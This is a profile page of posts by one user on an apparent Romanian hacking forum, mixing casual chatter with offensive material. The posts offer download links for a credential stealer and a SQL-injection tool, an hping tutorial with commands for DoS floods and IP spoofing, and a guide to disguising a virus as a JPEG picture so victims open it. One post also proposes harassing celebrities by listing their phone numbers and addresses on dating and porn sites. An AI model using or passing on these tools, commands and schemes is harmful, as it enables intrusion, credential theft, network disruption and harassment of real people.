Jump to content

CrashOverline

Active Members
  • Posts

    137
  • Joined

  • Last visited

Everything posted by CrashOverline

  1. Download http://www.4shared.com/file/147402090/6229b5f3/LeGEnD-Stealer-GuI.html http://rapidshare.com/files/303133219/LeGEnD-Stealer.rar http://www.sendspace.com/file/c0frt9
  2. Havij -----Version 1.06Copyright © 2009By r3dm0v3 3dm0v3[4t]yahoo[.]comPlease tell me your offers and report bugs.Check for updates!Licence -------This program is free software. I hope it be useful for you.This software is provided "as is" without warranties.Feel free to share and distribute it anywhere but please keep the files original!What's New? ------------Oracle database-MsAccess database-Find Admin-Proxy support-Filtering enabled-update/delete/insert-Group_concat for mysql-New look-User agent header-Load cookie from page-Analyze method made better (specially for mysql)-Many bugs fixed.Features -----------------Data Bases: MsSQL 2000/2005 with error, MsSQL 2000/2005 no error, MySQL, Oracle, MsAccessFind admin pageGetting InformationGetting Tables, Columns, DataCommand Executation (mssql only)Reading Files (mysql only)insert/update/delete dataProxy supportGuessing tables and columns in mysql<5Fast getting tables and columns for mysql.Checking different injection syntaxes.Changing http headersBypass illegal union.Avoid using strings. DOWNLOAD LINKS:- http://www.megaupload.com/?d=IFBVFN43 http://rs220.rapidshare.com/files/317718223/Havij.rar
  3. Download: http://rapidshare.com/files/298998814/MD5_Best_Hash_Cracker.rar
  4. Hi Jonny x
  5. CrashOverline

    Pax

    PenisMan :D:D
  6. Franta sa fie si ma bag si eo ( nu imi place franceza ) , ma anuntati cand incepem, idu meu <-------
  7. cipsuri ----------------------- Am o idee, sa facem o categorie sau un topic, "Adevarul" sau "TheTru " :D:D In care fiecare membru sa aduca documentare si alte chestii, sa incercam sa aflam adevarul
  8. CrashOverline

    Bautori

    Hahaha, frumos site, frumoasa idee drogati.ro cand apare? :D:D edit: asta ^^ il asteapta pe Tin...
  9. dute ma, primul site din romania e RST . Oare care o fi cel mai vechi site?
  10. :D:D 60% din posturile tale sunt "salam alecum" on: Welcome to rst iamback!
  11. ahahahaha, ce tare prima data m-am speriat cand a inceput aia :D:D edit: pentru Tinkode nu ai ?
  12. :D:D funny Pai tu in postul tau ai spus ceva de genu: Exista maimute cu 6 picioare' date=' da, chiar acolo...in...padure, da nu va spun care...think...no-tech. ? Care e faza cu : ca nu m-am prins...??? @kw3rln: trebuie sa mai faci un pool :D:D
  13. There are many tools for testing if a network does not mince attacks such as DoS, sniffing, spoofing clips, and a significant help admin to make the network more secure as it can. At the same time these tools can be a nightmare for an admin who has not taken the steps paraitita. That in a nutshell can be used for good purposes can, however chrisimopoithoun and bad. It depends on what side we are and what we want. In this article we will take the hand of the aggressor and chrisi9mopoiisoume a very powerful tool hping. For those who do not know what makes this tool I refer you here: http://en.wikipedia.org/wiki/Hping First you should download (if you have naturally) in hping from here: http://www.hping.org/download.php After you install on your system, you will go to either terminal (linux / unix), or the Command prompt (cmd) for Windows. The tutorial will be linux fedora course there is no difference between systimatos in this tool. To see what parameters dechete about this tool is sufficient to typed hping - help, and will take us all parameters and what each one. Certainly not here to analyze all but you can peiramatistite. The following are some (not-so-innocent) uses of this tool. DoS: The fear and terror of an admin is not to drop your network that do not accept a DoS attack even from within the network. With this tool we kalista causing a DoS kapoioa network device making it impossible to serve the network. Suppose we want to attack a router network be typed the following command. hping - flood 192.168.2.1 The format is very simple. Just tell hping to send packets to the router constantly in my case 192.168.2.1 CAUTION: If you are connected to the internet connection will be dropped but do not worry it epanelei. We can add other parameters depending on what we do. Eg We can change how many hops the TTL to be done to reach its destination (Time to live - Wikipedia, the free encyclopedia), exactly how many packages will send clips. hping - flood - ttl 2 - count 100 192.168.2.1 In the above command just hping commands to send 100 packages to flood mode with ttl 2 to router 192.168.2.1 Of course, of course there are other parameters that you can find them if you typed hping - help Simple ip spoofing On to hping can execute and ip spoofing attacks. You will perform a simple ip spoofing attack. (There is a blind ip spoofing but wants a lot of time and patience) Dialdi to send a package from us ip (192.168.2.29), the router (192.168.2.1) having to change source ip from 192.168.2.29 to any one we like 192.168.2.100 To execute ip spoofing attacks again the syntax is quite easy: hping - spoof [fake source address] [destination address] That is, if we want to make the example given above is sufficient to "give" the following command: hping - spoof 192.168.2.100 192.168.2.1 And the results in WireShark. As we have seen a single ip spoofing .... Ip spoofing & DoS mixed: Now we will attack ip spoofing & DoS taftochtona. That will make DoS another pc on the network with spoofed ip address (we will put ip address as the address of the router), so the pc will do flood to think that the requests come from the router so that steleni responses resulting have the same effect as described on poti case. Anlaftikotera .. hping - flood - spoof 192.168.2.1 - ttl 2 192.168.2.34 Let me explain .... We normally flood as in the first case with a false ip (router ip), in order the pc to think that the requests come from the router and the answering plimyrizontas with packages making it impossible to service the network ... Sending custom packets: hping boryme the course and send our packages. What I mean. Do we capture a packet file from wireshark for example, and then to give the course and hping to send it as a spoofed address. What detail: hping - spoof 192.168.2.100-d 100-E testfile 192.168.2.1 Let me explain .. The unknown parameter - spoof set the fake address. The-d is the packet size. How is the packet size,-R is the record of the captured packets in, and 192.168.2.1 is the goal. The package I have done to capture WireShark and a simple packet icmp echo request (The packet is sent when a computer makes ping). And here is the result of this mandate in WireShark .... And of course you can dyndyazetai parameters as well and others have failed, moreover, for this is both possible tool. ======================================= Tin sa precizez ca tutorialul a fost tradus cu google trans. din limba greaca in cea engleza. Sper sa intelegeti... Il traduceam direct in romana dar se intelege mai bine in engleza
  14. Hide any file inside a picture! Items Needed: Any Icon Changer A Binder A Brain 1) Create your virus. We shall call it 'server1.exe' for now. 2) Get any picture file you want to distribute. 3) Bind the 'server1.exe' and your picture file with any binder, we'll call the binded file 'virus1.exe'. 3.5) I reccomend Easy Binder 2.0, which comes with a bytes adder and a icon extractor, aswell as some really good packing options. I've uploaded it, virus free, to: Easy_Binder.rar 4) Be sure you have 'Hide common extensions' unchecked in your Folder Options. 5) Change the 'virus1.exe' to '%Picturename%.jpeg - %Email/Web Address%.com'. For example, we'll call it 'HPIC_119.jpeg - undies@live.com'. .com works the same as .exe, except fewer people actually know that's what it really is. 6) If you plan on distributing your virus via MSN, please skip to 7. If you plan on distributing your virus via file upload sites, please skip to 8. 6.5) I reccomend Icon Extractor V3.8 FULL with Serial, that can be downloaded from this thread: Hack Forums 7) You will now need to change the icon from that ugly box. Find the picture you added to the file, and make it an icon. How? Find one of the various online Picture to Icon converters. Once your picture is a .ico, use your Icon Changer program to change the icon of the file to the .ico you just made from the picture. When you send it to people on MSN, it will show a small box of the picture inside. 8) You will not need to change the icon from that ugly box. Using your Icon Changer program, find the .jpeg icon, and change the ugly box to the .jpeg icon. 9) Conclusion. Your file will now look like a legit picture to 9/10 people. Some people do know that .com is an extension, but the average computer user will not see any difference, and will download it without hesitation. I have never come across a tutorial that explains how to do this, and found this out after hours of online searching. If there is another tutorial, all credits to them, my mistake. #Sursa: hackforums[dot]net
  15. Eu am avut de la 2 Am avut romtelecom+zapp, amandoua deodata Atunci cand pica romtelecom (aveam probleme cu tensiunea) continua zapp, problema era ca atunci cand revenea romtelecom , tot zapp ramanea, trebuiea sa opresc zapp ca sa ramana rom...
  16. Am si eu o propunere, 1.Luam o vedeta, una la care avem nr tel, adresa, si cate ceva despre ea. 2.Intram pe siteuri matriloniale, intalniri, xxx, etc 3.Ne facem conturi sub numele acelor vip, punem tel, adresa... 4.Ne facem prieteni 5.Vedetele sunt sunate de diferite persoane care le propun diverse chestii. Sau punctu 2 in loc de xxx si matrimoniale, siteuri de vanzari cam atat Sustinatori? Pareri?
  17. Uita-te aici.
  18. Am vazut la "Acces direct" aseara, penal..Aia nu merita sa fie profa de romana. O profesoara de romana nu ar face asa ceva, chiar daca este batjocorita si bruscata. In afara (in alta tara, nu in romania) daca da-i intr-un politist ajungi la bulau inainte sa zici "iiiooiii". Si apropo ala de a spus "iiiiooooiiii" era cameramanu . Politistu nu a facut bine, chiar daca era legitima aparare, totusi este un politist....
  19. e dusa deja...si e dusa tareee... Imi da si mie cineva un link pt cateva proxy-uri ? pt linux? Multumesc!
  20. Definirea conceptelor adware, spyware si grayware Adware-ul, spyware-ul si grayware-ul sunt in general instalate intr-un calculator fara cunostinta utilizatorului. Aceste programe colecteaza informatii stocate in calculator, schimba configuratia calculatorului, deschid ferestre suplimentare pe calculator fara consimtamantul utilizatorului. Adware-ul este un software ce afiseaza publicitate pe calculatorul dumneavoastra. Adware-ul este in general distribuit cu programele descarcate de pe Internet. Cel mai adesea, adware-ul este afisat intr-o fereastra pop-up. Ferestrele pop-up cu adware sunt uneori dificil de controlat si deschid ferestre noi mai repede decat utilizatorul le poate inchide. Grayware-ul sau malware-ul este un fisier sau un program, altul decat un virus, care este potential daunator. Multe atacuri grayware sunt atacuri de tip phishing ce incearca sa convinga cititorul sa ofere atacatorului acces la informatii personale fara ca acesta sa stie. Pe masura ce completati un formular online, datele sunt trimise la atacator. Grayware-ul poate fi inlaturat folosind unelte de inlaturare spyware si adware. Spyware-ul, un tip de grayware, este similar cu adware-ul. Acesta este distribuit fara interventia si cunostinta utilizatorului. Odata instalat, spyware-ul monitorizeaza activitatea calculatorului. Spyware-ul transmite apoi aceasta informatie organizatiei responsabile de lansarea spyware-ului. Phishing-ul este o forma de inginerie sociala unde atacatorul pretinde sa reprezinte o organizatie externa legitima, ca de exemplu o banca. O potentiala victima este contactata prin e-mail. Atacatorul este posibil sa ceara sa verifice informatii, ca de exemplu parola sau username-ul, pentru a preveni presupuse consecinte teribile ce pot aparea. Explicarea atacului de tip Denial of Service Denial of Service (DoS) este o forma de atac care interzice utilizatorilor sa acceseze servicii standard precum un server de e-mail sau web, pentru ca sistemul este ocupat sa raspunda unui numar anormal de mare de cereri. DoS functioneaza prin trimiterea unui numar suficient de mare de cereri astfel incat serviciul cautat sa devina supraincarcat si sa cedeze. Atacurile tipice de tip DoS includ: Ping al mortii – O serie de ping-uri repetate mai mari decat cele normale care vor face sa cedeze calculatorul receptor. E-mail-ul bomba – O cantitate mare de mail bulk este transmisa asfel incat sa suprasolicite serverul de mail si sa impiedice utilizatorii normali sa acceseze serverul. DoS distribuit (DDoS) este o alta forma care foloseste mai multe calculatoare, numite zombi. Cu DDoS, intentia este sa se obstructioneze sau sa se suprasolicite accesul la serverul tinta. Calculatoarele de tip zombi aflate in diverse zone geografice fac dificila descoperirea originii atacului.
  21. Definirea virusilor, viermilor (Worms) si troienilor (Trojans) Virusii de calculator sunt creati si trimisi intentionat de catre atacatori. Un virus este atasat la mici bucati de cod de calculator, software sau documente. Virusul actioneaza atunci cand software-ul este rulat pe un calculator. Daca virusul se raspandeste si la alte calculatoare, acele calculatoare ar putea continua la randul lor la raspandirea virusului. Un virus este un program scris cu intentia de a crea daune si trimis de catre atacatori. Virusul este transferat la un alt calculator prin intermediul e-mail-ului, transferului de fisiere si a mesageriei instante. Virusul se ascunde prin atasarea la un fisier de pe calculator. Cand fisierul este accesat, virusul se declanseaza si infecteaza calculatorul. Un virus are puterea de a deteriora sau chiar de a sterge fisierele de pe calculatorul dumneavoastra, de a folosi e-mail-ul dumneavoastra pentru a se raspandi pe alte calculatoare sau chiar de a sterge intrega unitate de hard disk. Unii virusi pot fi extrem de periculosi. Cel mai periculos si daunator virus este folosit pentru inregistrarea informatiilor tastate. Acesti virusi pot fi folositi de atacatori pentru a aduna informatii importante, cum ar fi parole si numerele cartilor de credit. Virusii pot chiar distruge sau modifica informatiile de pe un calculator. Virusii invizibili pot infecta un calculator si pot ramane inactivi pana cand primesc o comanda de la atacator. Un vierme (worm) este un program cu auto-replicare care este daunator pentru retele. Un vierme foloseste reteaua pentru a-si multiplica codul pe calculatoarele din retea, de cele mai multe ori fara nici o interventie din partea utilizatorului. Acesta este diferit de un virus pentru ca un vierme nu are nevoie sa se anexeze la un program pentru a infecta un host. Chiar daca viermele nu dauneaza datelor sau aplicatiilor de pe host, el este daunator pentru retele deoarece consuma latimea de banda. Un troian (Trojan) este teoretic un vierme. Troianul nu este nevoie sa fie atasat la alte componente software. In schimb, o amenintare de tip troian este ascunsa intr-un software care pare ca face un lucru si de fapt face altul. Troienii sunt adesea deghizati in software-uri utile. Programul troian se poate reproduce ca un virus si se poate raspandi si la alte calculatoare. Deteriorarea datelor dintr-un calculator si pierderile de informatii pot fi semnificative. Este posibil sa fie nevoie de un tehnician pentru efectuarea reparatiilor si angajatii pot pierde sau pot fi nevoiti sa inlocuiasca date. Un calculator infectat ar putea trimite date critice la concurenta si in acelasi timp ar putea infecta alte calculatoare din retea. Software-ul de protectie impotriva virusilor, cunoscut sub denumirea de software anti-virus, este special conceput pentru a detecta, dezactiva si elimina virusi, viermi, troieni inainte ca acestia sa infecteze un calculator. Software-ul anti-virus devine repede depasit si este responsabilitatea tehnicianului de a aplica cele mai recente actualizari, patch-uri, precum si definitii ale virusilor ca parte a unui program regulat de intretinere. Multe organizatii stabilesc in scris o politica de securitate, precizand ca angajatilor nu li se permite sa instaleze nici un software care nu este oferit de catre companie. De asemenea organizatiile ii fac constienti pe angajati de pericolele la care se expun atunci cand deschid atasamentele e-mail-urilor care ar putea contine un virus sau un vierme. --------------------
      • 1
      • Upvote
  22. Cand a spus ca "simte ceva" probabil s-a referit la respect.
  23. Script kiddie Un script kiddie (se scrie uneori si "kiddy") este un termen depreciativ, lansat de hackerii sofisticati ai sistemelor de securitate ale calculatoarelor, pentru cineva neexperimentat, dar care, din nefericire, este adesea la fel de periculos si se ocupa cu cautarea hibelor din securitatea pe Internet. Un hacker amator tipic foloseste tehnici si programe sau scripturi existente si adesea bine cunoscute si usor de gasit, pentru a cauta si a exploata slabiciunile altor calculatoare din Internetm adesea la intamplare, si cu mai putin interes sau poate chiar intelegand posibilele consecinte daunatoare. Hackerii ii privesc pe amatori cu ingrijorare si dispret, deoarece ei nu fac nimic pentru a imbunatati "arta" unui hacker, doar ca uneori ei starnesc furia autoritatilor asupta intregii comunitati a hackerilor. In timp ce un hacker este mandru pentru calitatea sa de hacker - pentru ca, de exemplu, nu lasa nici o urma a intruziunii - un script kiddie pate urmari cantitatea, vazand in numarul de atacuri ce pot fi organizate un mijloc de a obtine atentia si notorietatea. Hackerii amatori sunt uneori caracterizati de presa ca fiind adolescenti plictisiti si singuratici, care cauta recunoastere de la cei de varsta lor. Acestia ataca de obicei din spirit de aventura, nu pentru castiguri financiare (insa si acestea pot di motive). Ca novici, hackerii amatori adesea nu stiu ce fac si fara sa-si dea seama , pot declansa un atac DoS (Denial of Service - blocare a unui serviciu). Adevarul este ca, in cele mai multe cazuri, hackerii experimentati au fost, la inceput, script kiddies. --------------------
  24. Pentru fani :D:D :
  25. hahaha :D:D, peste 2 saptamani veti vedea posturi de genu: "Vreau tatuaj cu RST!". Este buna ideea, dar nu merita sa va certati pentru un tricou... @demon_zone: Reusit tricoul dar cam prea colorat, ar fi mai dragut ceva simplu: In fata, in partea stanga....sau dreapta, o emblema micuta, da micuta, nu dita mai logou, iar pe spate scris rstcenter... si atat. In fine, nus asa mare fan rst, dar mi-ar placea sa port un tricou.
×
×
  • Create New...